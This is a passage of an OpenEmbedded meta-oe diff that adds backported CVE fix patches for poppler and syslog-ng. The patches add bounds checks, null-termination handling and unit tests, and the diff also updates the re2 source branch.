++ if (unlikely(checkedAdd(numSyms, segSize, &numSyms))) { ++ error(errSyntaxError, getPos(), "Too many symbols in JBIG2 text region"); ++ return; ++ } + } else if (seg->getType() == jbig2SegCodeTable) { + codeTables.push_back(seg); + } +-- +2.25.1 diff --git a/meta-oe/recipes-support/poppler/poppler/CVE-2023-34872.patch b/meta-oe/recipes-support/poppler/poppler/CVE-2023-34872.patch new file mode 100644 index 0000000000..7fdc293aac --- /dev/null +++ b/meta-oe/recipes-support/poppler/poppler/CVE-2023-34872.patch @@ -0,0 +1,46 @@ +From 591235c8b6c65a2eee88991b9ae73490fd9afdfe Mon Sep 17 00:00:00 2001 +From: Albert Astals Cid <aacid@kde.org> +Date: Fri, 18 Aug 2023 08:22:06 +0000 +Subject: [PATCH] OutlineItem::open: Fix crash on malformed files + +Fixes #1399 + +CVE: CVE-2023-34872 + +Upstream-Status: Backport [https://gitlab.freedesktop.org/poppler/poppler/-/commit/591235c8b6c65a2eee88991b9ae73490fd9afdfe] + +Signed-off-by: Yogita Urade <yogita.urade@windriver.com> +--- + poppler/Outline.cc | 10 +++++++--- + 1 file changed, 7 insertions(+), 3 deletions(-) + +diff --git a/poppler/Outline.cc b/poppler/Outline.cc +index cbb6cb4..4c68be9 100644 +--- a/poppler/Outline.cc ++++ b/poppler/Outline.cc +@@ -14,7 +14,7 @@ + // under GPL version 2 or later + // + // Copyright (C) 2005 Marco Pesenti Gritti <mpg@redhat.com> +-// Copyright (C) 2008, 2016-2019, 2021 Albert Astals Cid <aacid@kde.org> ++// Copyright (C) 2008, 2016-2019, 2021, 2023 Albert Astals Cid <aacid@kde.org> + // Copyright (C) 2009 Nick Jones <nick.jones@network-box.com> + // Copyright (C) 2016 Jason Crain <jason@aquaticape.us> + // Copyright (C) 2017 Adrian Johnson <ajohnson@redneon.com> +@@ -483,8 +483,12 @@ void OutlineItem::open() + { + if (!kids) { + Object itemDict = xref->fetch(ref); +- const Object &firstRef = itemDict.dictLookupNF("First"); +- kids = readItemList(this, &firstRef, xref, doc); ++ if (itemDict.isDict()) { ++ const Object &firstRef = itemDict.dictLookupNF("First"); ++ kids = readItemList(this, &firstRef, xref, doc); ++ } else { ++ kids = new std::vector<OutlineItem *>(); ++ } + } + } + +-- +2.35.5 diff --git a/meta-oe/recipes-support/poppler/poppler_22.04.0.bb b/meta-oe/recipes-support/poppler/poppler_22.04.0.bb index b7cdb4f1be..04106f11aa 100644 --- a/meta-oe/recipes-support/poppler/poppler_22.04.0.bb +++ b/meta-oe/recipes-support/poppler/poppler_22.04.0.bb @@ -6,6 +6,8 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=751419260aa954499f7abaabaa882bbe" SRC_URI = "http://poppler.freedesktop.org/${BP}.tar.xz \ file://0001-Do-not-overwrite-all-our-build-flags.patch \ file://basename-include.patch \ + file://0001-JBIG2Stream-Fix-crash-on-broken-file.patch \ + file://CVE-2023-34872.patch \ " SRC_URI[sha256sum] = "813fb4b90e7bda63df53205c548602bae728887a60f4048aae4dbd9b1927deff" diff --git a/meta-oe/recipes-support/re2/re2_2020.11.01.bb b/meta-oe/recipes-support/re2/re2_2020.11.01.bb index 698fe7e497..5ec1c6b5ab 100644 --- a/meta-oe/recipes-support/re2/re2_2020.11.01.bb +++ b/meta-oe/recipes-support/re2/re2_2020.11.01.bb @@ -5,7 +5,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=3b5c31eb512bdf3cb11ffd5713963760" SRCREV = "166dbbeb3b0ab7e733b278e8f42a84f6882b8a25" -SRC_URI = "git://github.com/google/re2.git;branch=master;protocol=https" +SRC_URI = "git://github.com/google/re2.git;branch=main;protocol=https" S = "${WORKDIR}/git" diff --git a/meta-oe/recipes-support/syslog-ng/files/CVE-2022-38725-0001.patch b/meta-oe/recipes-support/syslog-ng/files/CVE-2022-38725-0001.patch new file mode 100644 index 0000000000..7d1dd6582f --- /dev/null +++ b/meta-oe/recipes-support/syslog-ng/files/CVE-2022-38725-0001.patch @@ -0,0 +1,65 @@ +From b5a060f2ebb8d794f508436a12e4d4163f94b1b8 Mon Sep 17 00:00:00 2001 +From: Laszlo Varady <laszlo.varady@protonmail.com> +Date: Sat, 20 Aug 2022 12:26:05 +0200 +Subject: [PATCH 1/8] syslogformat: fix out-of-bounds reading of data buffer +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +CVE: CVE-2022-38725 + +Upstream-Status: Backport +[https://github.com/syslog-ng/syslog-ng/commit/b5a060f2ebb8d794f508436a12e4d4163f94b1b8] + +Signed-off-by: László Várady <laszlo.varady@protonmail.com> + +Signed-off-by: Yogita Urade <yogita.urade@windriver.com> +--- + modules/syslogformat/syslog-format.c | 10 +++++++--- + 1 file changed, 7 insertions(+), 3 deletions(-) + +diff --git a/modules/syslogformat/syslog-format.c b/modules/syslogformat/syslog-format.c +index aacb525b3..872cc1d71 100644 +--- a/modules/syslogformat/syslog-format.c ++++ b/modules/syslogformat/syslog-format.c +@@ -223,6 +223,9 @@ log_msg_parse_cisco_timestamp_attributes(LogMessage *self, const guchar **data, + const guchar *src = *data; + gint left = *length; + ++ if (!left) ++ return; ++ + /* Cisco timestamp extensions, the first '*' indicates that the clock is + * unsynced, '.' if it is known to be synced */ + if (G_UNLIKELY(src[0] == '*')) +@@ -562,7 +565,7 @@ log_msg_parse_sd(LogMessage *self, const guchar **data, gint *length, const MsgF + open_sd++; + do + { +- if (!isascii(*src) || *src == '=' || *src == ' ' || *src == ']' || *src == '"') ++ if (!left || !isascii(*src) || *src == '=' || *src == ' ' || *src == ']' || *src == '"') + goto error; + /* read sd_id */ + pos = 0; +@@ -595,7 +598,8 @@ log_msg_parse_sd(LogMessage *self, const guchar **data, gint *length, const MsgF + sd_id_len = pos; + strcpy(sd_value_name, logmsg_sd_prefix); + strncpy(sd_value_name + logmsg_sd_prefix_len, sd_id_name, sizeof(sd_value_name) - logmsg_sd_prefix_len); +- if (*src == ']') ++ ++ if (left && *src == ']') + { + log_msg_set_value_by_name(self, sd_value_name, "", 0); + } +@@ -612,7 +616,7 @@ log_msg_parse_sd(LogMessage *self, const guchar **data, gint *length, const MsgF + else + goto error; + +- if (!isascii(*src) || *src == '=' || *src == ' ' || *src == ']' || *src == '"') ++ if (!left || !isascii(*src) || *src == '=' || *src == ' ' || *src == ']' || *src == '"') + goto error; + + /* read sd-param */ +-- +2.34.1 + diff --git a/meta-oe/recipes-support/syslog-ng/files/CVE-2022-38725-0002.patch b/meta-oe/recipes-support/syslog-ng/files/CVE-2022-38725-0002.patch new file mode 100644 index 0000000000..9ccb24ddea --- /dev/null +++ b/meta-oe/recipes-support/syslog-ng/files/CVE-2022-38725-0002.patch @@ -0,0 +1,150 @@ +From 81a07263f1e522a376d3a30f96f51df3f2879f8a Mon Sep 17 00:00:00 2001 +From: Laszlo Varady <laszlo.varady@protonmail.com> +Date: Sat, 20 Aug 2022 12:22:44 +0200 +Subject: [PATCH 2/8] syslogformat: add bug reproducer test for non-zero terminated + input +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +CVE: CVE-2022-38725 + +Upstream-Status: Backport +[https://github.com/syslog-ng/syslog-ng/commit/81a07263f1e522a376d3a30f96f51df3f2879f8a] + +Signed-off-by: László Várady <laszlo.varady@protonmail.com> + +Signed-off-by: Yogita Urade <yogita.urade@windriver.com> +--- + modules/syslogformat/CMakeLists.txt | 1 + + modules/syslogformat/Makefile.am | 2 + + modules/syslogformat/tests/CMakeLists.txt | 1 + + modules/syslogformat/tests/Makefile.am | 9 +++ + .../syslogformat/tests/test_syslog_format.c | 72 +++++++++++++++++++ + 5 files changed, 85 insertions(+) + create mode 100644 modules/syslogformat/tests/CMakeLists.txt + create mode 100644 modules/syslogformat/tests/Makefile.am + create mode 100644 modules/syslogformat/tests/test_syslog_format.c + +diff --git a/modules/syslogformat/CMakeLists.txt b/modules/syslogformat/CMakeLists.txt +index 94ee01aa2..64848efee 100644 +--- a/modules/syslogformat/CMakeLists.txt ++++ b/modules/syslogformat/CMakeLists.txt +@@ -14,3 +14,4 @@ add_module( + SOURCES ${SYSLOGFORMAT_SOURCES} + ) + ++add_test_subdirectory(tests) +diff --git a/modules/syslogformat/Makefile.am b/modules/syslogformat/Makefile.am +index f13f88c1b..14cdf589d 100644 +--- a/modules/syslogformat/Makefile.am ++++ b/modules/syslogformat/Makefile.am +@@ -31,3 +31,5 @@ modules_syslogformat_libsyslogformat_la_DEPENDENCIES = \ + modules/syslogformat modules/syslogformat/ mod-syslogformat: \ + modules/syslogformat/libsyslogformat.la + .PHONY: modules/syslogformat/ mod-syslogformat ++ ++include modules/syslogformat/tests/Makefile.am +diff --git a/modules/syslogformat/tests/CMakeLists.txt b/modules/syslogformat/tests/CMakeLists.txt +new file mode 100644 +index 000000000..2e45b7194 +--- /dev/null ++++ b/modules/syslogformat/tests/CMakeLists.txt +@@ -0,0 +1 @@ ++add_unit_test(CRITERION TARGET test_syslog_format DEPENDS syslogformat) +diff --git a/modules/syslogformat/tests/Makefile.am b/modules/syslogformat/tests/Makefile.am +new file mode 100644 +index 000000000..7ee66a59c +--- /dev/null ++++ b/modules/syslogformat/tests/Makefile.am +@@ -0,0 +1,9 @@ ++modules_syslogformat_tests_TESTS = \ ++ modules/syslogformat/tests/test_syslog_format ++ ++check_PROGRAMS += ${modules_syslogformat_tests_TESTS} ++ ++EXTRA_DIST += modules/syslogformat/tests/CMakeLists.txt ++ ++modules_syslogformat_tests_test_syslog_format_CFLAGS = $(TEST_CFLAGS) -I$(top_srcdir)/modules/syslogformat ++modules_syslogformat_tests_test_syslog_format_LDADD = $(TEST_LDADD) $(PREOPEN_SYSLOGFORMAT) +diff --git a/modules/syslogformat/tests/test_syslog_format.c b/modules/syslogformat/tests/test_syslog_format.c +new file mode 100644 +index 000000000..b247fe3c5 +--- /dev/null ++++ b/modules/syslogformat/tests/test_syslog_format.c +@@ -0,0 +1,72 @@ ++/* ++ * Copyright (c) 2022 One Identity ++ * Copyright (c) 2022 László Várady ++ * ++ * This program is free software; you can redistribute it and/or modify it ++ * under the terms of the GNU General Public License version 2 as published ++ * by the Free Software Foundation, or (at your option) any later version. ++ * ++ * This program is distributed in the hope that it will be useful, ++ * but WITHOUT ANY WARRANTY; without even the implied warranty of ++ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the ++ * GNU General Public License for more details. ++ * ++ * You should have received a copy of the GNU General Public License ++ * along with this program; if not, write to the Free Software ++ * Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA ++ * ++ * As an additional exemption you are allowed to compile & link against the ++ * OpenSSL libraries as published by the OpenSSL project. See the file ++ * COPYING for details. ++ * ++ */ ++ ++#include <criterion/criterion.h> ++ ++#include "apphook.h" ++#include "cfg.h" ++#include "syslog-format.h" ++#include "logmsg/logmsg.h" ++#include "msg-format.h" ++#include "scratch-buffers.h" ++ ++#include <string.h> ++ ++GlobalConfig *cfg; ++MsgFormatOptions parse_options; ++ ++static void ++setup(void) ++{ ++ app_startup(); ++ syslog_format_init(); ++ ++ cfg = cfg_new_snippet(); ++ msg_format_options_defaults(&parse_options); ++} ++ ++static void ++teardown(void) ++{ ++ scratch_buffers_explicit_gc(); ++ app_shutdown(); ++ cfg_free(cfg); ++} ++ ++TestSuite(syslog_format, .init = setup, .fini = teardown); ++ ++Test(syslog_format, parser_should_not_spin_on_non_zero_terminated_input, .timeout = 10) ++{ ++ const gchar *data = "<182>2022-08-17T05:02:28.217 mymachine su: 'su root' failed for lonvick on /dev/pts/8"; ++ /* chosen carefully to reproduce a bug */ ++ gsize data_length = 27; ++ ++ msg_format_options_init(&parse_options, cfg); ++ LogMessage *msg = msg_format_construct_message(&parse_options, (const guchar *) data, data_length); ++ ++ gsize problem_position; ++ cr_assert(syslog_format_handler(&parse_options, msg, (const guchar *) data, data_length, &problem_position)); ++ ++ msg_format_options_destroy(&parse_options); ++ log_msg_unref(msg); ++} +-- +2.34.1 + diff --git a/meta-oe/recipes-support/syslog-ng/files/CVE-2022-38725-0003.patch b/meta-oe/recipes-support/syslog-ng/files/CVE-2022-38725-0003.patch new file mode 100644 index 0000000000..5801165048 --- /dev/null +++ b/meta-oe/recipes-support/syslog-ng/files/CVE-2022-38725-0003.patch @@ -0,0 +1,77 @@ +From 4b8dc56ca8eaeac4c8751a305eb7eeefab8dc89d Mon Sep 17 00:00:00 2001 +From: Laszlo Varady <laszlo.varady@protonmail.com> +Date: Sun, 21 Aug 2022 18:44:28 +0200 +Subject: [PATCH 3/8] syslogformat: fix reading cisco sequence id out of bounds +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +CVE: CVE-2022-38725 + +Upstream-Status: Backport +[https://github.com/syslog-ng/syslog-ng/commit/4b8dc56ca8eaeac4c8751a305eb7eeefab8dc89d] + +Signed-off-by: László Várady <laszlo.varady@protonmail.com> + +Signed-off-by: Yogita Urade <yogita.urade@windriver.com> +--- + modules/syslogformat/syslog-format.c | 2 +- + .../syslogformat/tests/test_syslog_format.c | 32 +++++++++++++++++++ + 2 files changed, 33 insertions(+), 1 deletion(-) + +diff --git a/modules/syslogformat/syslog-format.c b/modules/syslogformat/syslog-format.c +index 872cc1d71..a3d48d6f2 100644 +--- a/modules/syslogformat/syslog-format.c ++++ b/modules/syslogformat/syslog-format.c +@@ -207,7 +207,7 @@ log_msg_parse_cisco_sequence_id(LogMessage *self, const guchar **data, gint *len + + /* if the next char is not space, then we may try to read a date */ + +- if (*src != ' ') ++ if (!left || *src != ' ') + return; + + log_msg_set_value(self, handles.cisco_seqid, (gchar *) *data, *length - left - 1); +diff --git a/modules/syslogformat/tests/test_syslog_format.c b/modules/syslogformat/tests/test_syslog_format.c +index b247fe3c5..d0f5b4043 100644 +--- a/modules/syslogformat/tests/test_syslog_format.c ++++ b/modules/syslogformat/tests/test_syslog_format.c +@@ -70,3 +70,35 @@ Test(syslog_format, parser_should_not_spin_on_non_zero_terminated_input, .timeou + msg_format_options_destroy(&parse_options); + log_msg_unref(msg); + } ++ ++Test(syslog_format, cisco_sequence_id_non_zero_termination) ++{ ++ const gchar *data = "<189>65536: "; ++ gsize data_length = strlen(data); ++ ++ msg_format_options_init(&parse_options, cfg); ++ LogMessage *msg = msg_format_construct_message(&parse_options, (const guchar *) data, data_length); ++ ++ gsize problem_position; ++ cr_assert(syslog_format_handler(&parse_options, msg, (const guchar *) data, data_length, &problem_position)); ++ cr_assert_str_eq(log_msg_get_value_by_name(msg, ".SDATA.meta.sequenceId", NULL), "65536"); ++ ++ msg_format_options_destroy(&parse_options); ++ log_msg_unref(msg); ++} ++ ++Test(syslog_format, minimal_non_zero_terminated_numeric_message_is_parsed_as_program_name) ++{ ++ const gchar *data = "<189>65536"; ++ gsize data_length = strlen(data); ++ ++ msg_format_options_init(&parse_options, cfg); ++ LogMessage *msg = msg_format_construct_message(&parse_options, (const guchar *) data, data_length); ++ ++ gsize problem_position; ++ cr_assert(syslog_format_handler(&parse_options, msg, (const guchar *) data, data_length, &problem_position)); ++ cr_assert_str_eq(log_msg_get_value_by_name(msg, "PROGRAM", NULL), "65536"); ++ ++ msg_format_options_destroy(&parse_options); ++ log_msg_unref(msg); ++} +-- +2.34.1 + diff --git a/meta-oe/recipes-support/syslog-ng/files/CVE-2022-38725-0004.patch b/meta-oe/recipes-support/syslog-ng/files/CVE-2022-38725-0004.patch new file mode 100644 index 0000000000..cb81b1c122 --- /dev/null +++ b/meta-oe/recipes-support/syslog-ng/files/CVE-2022-38725-0004.patch @@ -0,0 +1,37 @@ +From 73b5c300b8fde5e7a4824baa83a04931279abb37 Mon Sep 17 00:00:00 2001 +From: Laszlo Varady <laszlo.varady@protonmail.com> +Date: Sat, 20 Aug 2022 12:42:38 +0200 +Subject: [PATCH 4/8] timeutils: fix iterating out of the range of timestamp buffer +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +CVE: CVE-2022-38725 + +Upstream-Status: Backport +[https://github.com/syslog-ng/syslog-ng/commit/73b5c300b8fde5e7a4824baa83a04931279abb37] + +Signed-off-by: László Várady <laszlo.varady@protonmail.com> +Signed-off-by: Balazs Scheidler <bazsi77@gmail.com> + +Signed-off-by: Yogita Urade <yogita.urade@windriver.com> +--- + lib/timeutils/scan-timestamp.c | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +diff --git a/lib/timeutils/scan-timestamp.c b/lib/timeutils/scan-timestamp.c +index 304a57673..4fbe94a36 100644 +--- a/lib/timeutils/scan-timestamp.c ++++ b/lib/timeutils/scan-timestamp.c +@@ -332,7 +332,7 @@ __parse_usec(const guchar **data, gint *length) + src++; + (*length)--; + } +- while (isdigit(*src)) ++ while (*length > 0 && isdigit(*src)) + { + src++; + (*length)--; +-- +2.34.1 + diff --git a/meta-oe/recipes-support/syslog-ng/files/CVE-2022-38725-0005.patch b/meta-oe/recipes-support/syslog-ng/files/CVE-2022-38725-0005.patch new file mode 100644 index 0000000000..70964b328b --- /dev/null +++ b/meta-oe/recipes-support/syslog-ng/files/CVE-2022-38725-0005.patch @@ -0,0 +1,211 @@ +From 45f051239312e43bd4f92b9339fe67c6798a0321 Mon Sep 17 00:00:00 2001 +From: Balazs Scheidler <bazsi77@gmail.com> +Date: Sat, 20 Aug 2022 12:43:42 +0200 +Subject: [PATCH 5/8] timeutils: add tests for non-zero terminated inputs + +CVE: CVE-2022-38725 + +Upstream-Status: Backport +[https://github.com/syslog-ng/syslog-ng/commit/45f051239312e43bd4f92b9339fe67c6798a0321] + +Signed-off-by: Balazs Scheidler <bazsi77@gmail.com> + +Signed-off-by: Yogita Urade <yogita.urade@windriver.com> +--- + lib/timeutils/tests/test_scan-timestamp.c | 126 +++++++++++++++++++--- + 1 file changed, 113 insertions(+), 13 deletions(-) + +diff --git a/lib/timeutils/tests/test_scan-timestamp.c b/lib/timeutils/tests/test_scan-timestamp.c +index 27b76f12d..468bbf779 100644 +--- a/lib/timeutils/tests/test_scan-timestamp.c ++++ b/lib/timeutils/tests/test_scan-timestamp.c +@@ -50,17 +50,21 @@ fake_time_add(time_t diff) + } + + static gboolean +-_parse_rfc3164(const gchar *ts, gchar isotimestamp[32]) ++_parse_rfc3164(const gchar *ts, gint len, gchar isotimestamp[32]) + { + UnixTime stamp; +- const guchar *data = (const guchar *) ts; +- gint length = strlen(ts); ++ const guchar *tsu = (const guchar *) ts; ++ gint tsu_len = len < 0 ? strlen(ts) : len; + GString *result = g_string_new(""); + WallClockTime wct = WALL_CLOCK_TIME_INIT; + +- ++ const guchar *data = tsu; ++ gint length = tsu_len; + gboolean success = scan_rfc3164_timestamp(&data, &length, &wct); + ++ cr_assert(length >= 0); ++ cr_assert(data == &tsu[tsu_len - length]); ++ + unix_time_unset(&stamp); + convert_wall_clock_time_to_unix_time(&wct, &stamp); + +@@ -71,16 +75,21 @@ _parse_rfc3164(const gchar *ts, gchar isotimestamp[32]) + } + + static gboolean +-_parse_rfc5424(const gchar *ts, gchar isotimestamp[32]) ++_parse_rfc5424(const gchar *ts, gint len, gchar isotimestamp[32]) + { + UnixTime stamp; +- const guchar *data = (const guchar *) ts; +- gint length = strlen(ts); ++ const guchar *tsu = (const guchar *) ts; ++ gint tsu_len = len < 0 ? strlen(ts) : len; + GString *result = g_string_new(""); + WallClockTime wct = WALL_CLOCK_TIME_INIT; + ++ const guchar *data = tsu; ++ gint length = tsu_len; + gboolean success = scan_rfc5424_timestamp(&data, &length, &wct); + ++ cr_assert(length >= 0); ++ cr_assert(data == &tsu[tsu_len - length]); ++ + unix_time_unset(&stamp); + convert_wall_clock_time_to_unix_time(&wct, &stamp); + +@@ -91,31 +100,60 @@ _parse_rfc5424(const gchar *ts, gchar isotimestamp[32]) + } + + static gboolean +-_rfc3164_timestamp_eq(const gchar *ts, const gchar *expected, gchar converted[32]) ++_rfc3164_timestamp_eq(const gchar *ts, gint len, const gchar *expected, gchar converted[32]) + { +- cr_assert(_parse_rfc3164(ts, converted)); ++ cr_assert(_parse_rfc3164(ts, len, converted)); + return strcmp(converted, expected) == 0; + } + + static gboolean +-_rfc5424_timestamp_eq(const gchar *ts, const gchar *expected, gchar converted[32]) ++_rfc5424_timestamp_eq(const gchar *ts, gint len, const gchar *expected, gchar converted[32]) + { +- cr_assert(_parse_rfc5424(ts, converted)); ++ cr_assert(_parse_rfc5424(ts, len, converted)); + return strcmp(converted, expected) == 0; + } + + #define _expect_rfc3164_timestamp_eq(ts, expected) \ + ({ \ + gchar converted[32]; \ +- cr_expect(_rfc3164_timestamp_eq(ts, expected, converted), "Parsed RFC3164 timestamp does not equal expected, ts=%s, converted=%s, expected=%s", ts, converted, expected); \ ++ cr_expect(_rfc3164_timestamp_eq(ts, -1, expected, converted), "Parsed RFC3164 timestamp does not equal expected, ts=%s, converted=%s, expected=%s", ts, converted, expected); \ ++ }) ++ ++#define _expect_rfc3164_timestamp_len_eq(ts, len, expected) \ ++ ({ \ ++ gchar converted[32]; \ ++ cr_expect(_rfc3164_timestamp_eq(ts, len, expected, converted), "Parsed RFC3164 timestamp does not equal expected, ts=%s, converted=%s, expected=%s", ts, converted, expected); \ ++ }) ++ ++#define _expect_rfc3164_fails(ts, len) \ ++ ({ \ ++ WallClockTime wct = WALL_CLOCK_TIME_INIT; \ ++ const guchar *data = (guchar *) ts; \ ++ gint length = len < 0 ? strlen(ts) : len; \ ++ cr_assert_not(scan_rfc3164_timestamp(&data, &length, &wct)); \ + }) + + #define _expect_rfc5424_timestamp_eq(ts, expected) \ + ({ \ + gchar converted[32]; \ +- cr_expect(_rfc5424_timestamp_eq(ts, expected, converted), "Parsed RFC5424 timestamp does not equal expected, ts=%s, converted=%s, expected=%s", ts, converted, expected); \ ++ cr_expect(_rfc5424_timestamp_eq(ts, -1, expected, converted), "Parsed RFC5424 timestamp does not equal expected, ts=%s, converted=%s, expected=%s", ts, converted, expected); \ ++ }) ++ ++#define _expect_rfc5424_timestamp_len_eq(ts, len, expected) \ ++ ({ \ ++ gchar converted[32]; \ ++ cr_expect(_rfc5424_timestamp_eq(ts, len, expected, converted), "Parsed RFC5424 timestamp does not equal expected, ts=%s, converted=%s, expected=%s", ts, converted, expected); \ ++ }) ++ ++#define _expect_rfc5424_fails(ts, len) \ ++ ({ \ ++ WallClockTime wct = WALL_CLOCK_TIME_INIT; \ ++ const guchar *data = (guchar *) ts; \ ++ gint length = len < 0 ? strlen(ts) : len; \ ++ cr_assert_not(scan_rfc5424_timestamp(&data, &length, &wct)); \ + }) + ++ + Test(parse_timestamp, standard_bsd_format) + { + _expect_rfc3164_timestamp_eq("Oct 1 17:46:12", "2017-10-01T17:46:12.000+02:00"); +@@ -164,6 +202,68 @@ Test(parse_timestamp, standard_bsd_format_year_in_the_past) + _expect_rfc3164_timestamp_eq("Dec 31 17:46:12", "2017-12-31T17:46:12.000+01:00"); + } + ++Test(parse_timestamp, non_zero_terminated_rfc3164_iso_input_is_handled_properly) ++{ ++ gchar *ts = "2022-08-17T05:02:28.417Z whatever"; ++ gint ts_len = 24; ++ ++ _expect_rfc3164_timestamp_len_eq(ts, strlen(ts), "2022-08-17T05:02:28.417+00:00"); ++ _expect_rfc3164_timestamp_len_eq(ts, ts_len + 5, "2022-08-17T05:02:28.417+00:00"); ++ _expect_rfc3164_timestamp_len_eq(ts, ts_len, "2022-08-17T05:02:28.417+00:00"); ++ ++ /* no "Z" parsed, timezone defaults to local, forced CET */ ++ _expect_rfc3164_timestamp_len_eq(ts, ts_len - 1, "2022-08-17T05:02:28.417+02:00"); ++ ++ /* msec is partially parsed as we trim the string from the right */ ++ _expect_rfc3164_timestamp_len_eq(ts, ts_len - 2, "2022-08-17T05:02:28.410+02:00"); ++ _expect_rfc3164_timestamp_len_eq(ts, ts_len - 3, "2022-08-17T05:02:28.400+02:00"); ++ _expect_rfc3164_timestamp_len_eq(ts, ts_len - 4, "2022-08-17T05:02:28.000+02:00"); ++ _expect_rfc3164_timestamp_len_eq(ts, ts_len - 5, "2022-08-17T05:02:28.000+02:00"); ++ ++ for (gint i = 6; i < ts_len; i++) ++ _expect_rfc3164_fails(ts, ts_len - i); ++ ++} ++ ++Test(parse_timestamp, non_zero_terminated_rfc3164_bsd_pix_or_asa_input_is_handled_properly) ++{ ++ gchar *ts = "Aug 17 2022 05:02:28: whatever"; ++ gint ts_len = 21; ++ ++ _expect_rfc3164_timestamp_len_eq(ts, strlen(ts), "2022-08-17T05:02:28.000+02:00"); ++ _expect_rfc3164_timestamp_len_eq(ts, ts_len + 5, "2022-08-17T05:02:28.000+02:00"); ++ _expect_rfc3164_timestamp_len_eq(ts, ts_len, "2022-08-17T05:02:28.000+02:00"); ++ ++ /* no ":" at the end, that's a problem, unrecognized */ ++ _expect_rfc3164_fails(ts, ts_len - 1); ++ ++ for (gint i = 1; i < ts_len; i++) ++ _expect_rfc3164_fails(ts, ts_len - i); ++} ++ ++Test(parse_timestamp, non_zero_terminated_rfc5424_input_is_handled_properly) ++{ ++ gchar *ts = "2022-08-17T05:02:28.417Z whatever"; ++ gint ts_len = 24; ++ ++ _expect_rfc5424_timestamp_len_eq(ts, strlen(ts), "2022-08-17T05:02:28.417+00:00"); ++ _expect_rfc5424_timestamp_len_eq(ts, ts_len + 5, "2022-08-17T05:02:28.417+00:00"); ++ _expect_rfc5424_timestamp_len_eq(ts, ts_len, "2022-08-17T05:02:28.417+00:00"); ++ ++ /* no "Z" parsed, timezone defaults to local, forced CET */ ++ _expect_rfc5424_timestamp_len_eq(ts, ts_len - 1, "2022-08-17T05:02:28.417+02:00"); ++ ++ /* msec is partially parsed as we trim the string from the right */ ++ _expect_rfc5424_timestamp_len_eq(ts, ts_len - 2, "2022-08-17T05:02:28.410+02:00"); ++ _expect_rfc5424_timestamp_len_eq(ts, ts_len - 3, "2022-08-17T05:02:28.400+02:00"); ++ _expect_rfc5424_timestamp_len_eq(ts, ts_len - 4, "2022-08-17T05:02:28.000+02:00"); ++ _expect_rfc5424_timestamp_len_eq(ts, ts_len - 5, "2022-08-17T05:02:28.000+02:00"); ++ ++ for (gint i = 6; i < ts_len; i++) ++ _expect_rfc5424_fails(ts, ts_len - i); ++ ++} ++ + + Test(parse_timestamp, daylight_saving_behavior_at_spring_with_explicit_timezones) + { +-- +2.34.1 + diff --git a/meta-oe/recipes-support/syslog-ng/files/CVE-2022-38725-0006.patch b/meta-oe/recipes-support/syslog-ng/files/CVE-2022-38725-0006.patch new file mode 100644 index 0000000000..81e36c6501 --- /dev/null +++ b/meta-oe/recipes-support/syslog-ng/files/CVE-2022-38725-0006.patch @@ -0,0 +1,180 @@ +From 09f489c89c826293ff8cbd282cfc866ab56054c4 Mon Sep 17 00:00:00 2001 +From: Laszlo Varady <laszlo.varady@protonmail.com> +Date: Sat, 20 Aug 2022 14:29:43 +0200 +Subject: [PATCH 6/8] timeutils: name repeating constant +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +CVE: CVE-2022-38725 + +Upstream-Status: Backport +[https://github.com/syslog-ng/syslog-ng/commit/09f489c89c826293ff8cbd282cfc866ab56054c4] + +Signed-off-by: László Várady <laszlo.varady@protonmail.com> + +Signed-off-by: Yogita Urade <yogita.urade@windriver.com> +--- + lib/timeutils/scan-timestamp.c | 54 ++++++++++++++++++---------------- + 1 file changed, 29 insertions(+), 25 deletions(-) + +diff --git a/lib/timeutils/scan-timestamp.c b/lib/timeutils/scan-timestamp.c +index 4fbe94a36..d22d50973 100644 +--- a/lib/timeutils/scan-timestamp.c ++++ b/lib/timeutils/scan-timestamp.c +@@ -34,41 +34,43 @@ scan_day_abbrev(const gchar **buf, gint *left, gint *wday) + { + *wday = -1; + +- if (*left < 3) ++ const gsize abbrev_length = 3; ++ ++ if (*left < abbrev_length) + return FALSE; + + switch (**buf) + { + case 'S': +- if (strncasecmp(*buf, "Sun", 3) == 0) ++ if (strncasecmp(*buf, "Sun", abbrev_length) == 0) + *wday = 0; +- else if (strncasecmp(*buf, "Sat", 3) == 0) ++ else if (strncasecmp(*buf, "Sat", abbrev_length) == 0) + *wday = 6; + else + return FALSE; + break; + case 'M': +- if (strncasecmp(*buf, "Mon", 3) == 0) ++ if (strncasecmp(*buf, "Mon", abbrev_length) == 0) + *wday = 1; + else + return FALSE; + break; + case 'T': +- if (strncasecmp(*buf, "Tue", 3) == 0) ++ if (strncasecmp(*buf, "Tue", abbrev_length) == 0) + *wday = 2; +- else if (strncasecmp(*buf, "Thu", 3) == 0) ++ else if (strncasecmp(*buf, "Thu", abbrev_length) == 0) + *wday = 4; + else + return FALSE; + break; + case 'W': +- if (strncasecmp(*buf, "Wed", 3) == 0) ++ if (strncasecmp(*buf, "Wed", abbrev_length) == 0) + *wday = 3; + else + return FALSE; + break; + case 'F': +- if (strncasecmp(*buf, "Fri", 3) == 0) ++ if (strncasecmp(*buf, "Fri", abbrev_length) == 0) + *wday = 5; + else + return FALSE; +@@ -77,8 +79,8 @@ scan_day_abbrev(const gchar **buf, gint *left, gint *wday) + return FALSE; + } + +- (*buf) += 3; +- (*left) -= 3; ++ (*buf) += abbrev_length; ++ (*left) -= abbrev_length; + return TRUE; + } + +@@ -87,63 +89,65 @@ scan_month_abbrev(const gchar **buf, gint *left, gint *mon) + { + *mon = -1; + +- if (*left < 3) ++ const gsize abbrev_length = 3; ++ ++ if (*left < abbrev_length) + return FALSE; + + switch (**buf) + { + case 'J': +- if (strncasecmp(*buf, "Jan", 3) == 0) ++ if (strncasecmp(*buf, "Jan", abbrev_length) == 0) + *mon = 0; +- else if (strncasecmp(*buf, "Jun", 3) == 